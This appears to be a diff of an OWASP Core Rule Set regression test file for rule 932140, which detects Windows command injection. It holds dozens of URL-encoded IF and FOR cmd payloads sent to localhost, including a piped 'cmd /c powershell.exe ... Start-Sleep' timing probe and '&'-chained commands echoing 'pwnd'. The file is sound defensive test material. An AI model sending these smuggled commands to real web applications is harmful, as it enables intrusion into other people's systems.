"/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-116 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-117 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-118 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-119 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-120 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-121 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-122 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-123 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-124 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-125 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-126 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-127 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-128 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-129 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-130 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-131 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-132 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-133 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-134 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-135 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-136 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-137 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-138 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-139 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-140 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-141 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-142 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-143 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-144 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+not+%22A%251%22+%3D%3D+%22A%22+%28" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-145 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=IF+DEFINED+ARG+%28echo+%22It+is+defined%3A+%251%22%29+ELSE+%28echo+%22%25%251+is+not+defined%22%29" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-146 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+hfy6e8egfxsjtewc838gsfbhwvw9qzfty3gjs86syg7y6mrpwgw4ekureakjpk6%2Flyghe9pnfekpw2yt8svzseinhs1rbkuu%2Fzq15u5wh8nj8dd+fn86qcdwzv3s9hw35e14pxgcv34dhmt1mwbxnicwudjawfqz+fphmr5vlnufdihoffpuvqwkcmom61i3lisyxg65fx+rgbnrs6e4pmbvy2xl+vwb8oct23cyypregi638dkychllvvw5kq7rolfbhk3hojxz9tthunqky9dodqbb6u8roh+firwx8kuf1dfgewcto9eljhuaoqgdk4qwxlziktaf1mw2atcmw7jvzsh1s0kngiepps54lj4wtcbfzfvbqb7y3caffhnvfrm3tbjxlywqakfqxoprh7yooguat5flg2ozx5%2Fafn7w%3D%3D" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-147 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-148 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-149 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+a%3D%3Db+foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-150 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-151 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+not++%22a%22%3D%3D%22b%22++foo" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-152 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+++exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-153 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if+%2Fi+exist+StorageServer.port+echo+yay" - version: HTTP/1.0 - output: - log_contains: id "932140" - - test_title: 932140-154 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=ifq+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-155 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=iffoo+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-156 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-157 - desc: imported test - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=if3q+a%3D%3Db+foo" - version: HTTP/1.0 - output: - no_log_contains: id "932140" - - test_title: 932140-158 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=for%20%2ff%20%22usebackq%22%20%25variable%20in%20%28%60command%60%29%20do%20command" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 10 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%7Cfor+%2Ff+%22delims%3D%22+%25i+in+%28%27cmd+%2Fc+%22powershell.exe+-InputFormat+none+write+%27FJQPVY%27.length%22%27%29+do+if+%25i%3D%3D6+%28cmd+%2Fc+%22powershell.exe+-InputFormat+none+Start-Sleep+-s+2%22%29" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 11 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR++++++++++++++%25a+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 12 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+++++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 13 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FD+%2FD++++++++%25a+IN+%28dirs%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 14 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28text%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 15 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FF+%22options%22+%25a+IN+%28%22text%22%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 16 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+++++++++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 17 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FL+%2FL+%2FL+++++%25a+IN+%28start%2Cstep%2Cend%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 18 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=FOR+%2FR+C%3A%5Cbla++++%25A+IN+%28set%29+DO+abc" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 19 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+for+%25a+in+%28a%2Cb%2Cc%29+do+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 20 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%25a+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 21 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25_+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 22 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%252+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 23 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25-+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 24 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%2F+IN+%28a%2Cb%2Cc%29+DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 25 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%40+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 26 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5B+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 27 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%5D+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 28 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%25%7E+IN+%28a%2Cb%2Cc%29DO+cmd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 29 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25A+IN+%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 30 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22tokens%3D1-3%22+%25%25A+IN+++%28%22jejeje+brbr%22%29+DO+%40echo+pwnd" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 31 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%26+FOR+%2FF+%22delims%3D%22+%25G+IN+%28%27SET%27%29+DO+%40Echo+%25G" + version: HTTP/1.0 + output: + log: + expect_ids: [932140] + - test_id: 32 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 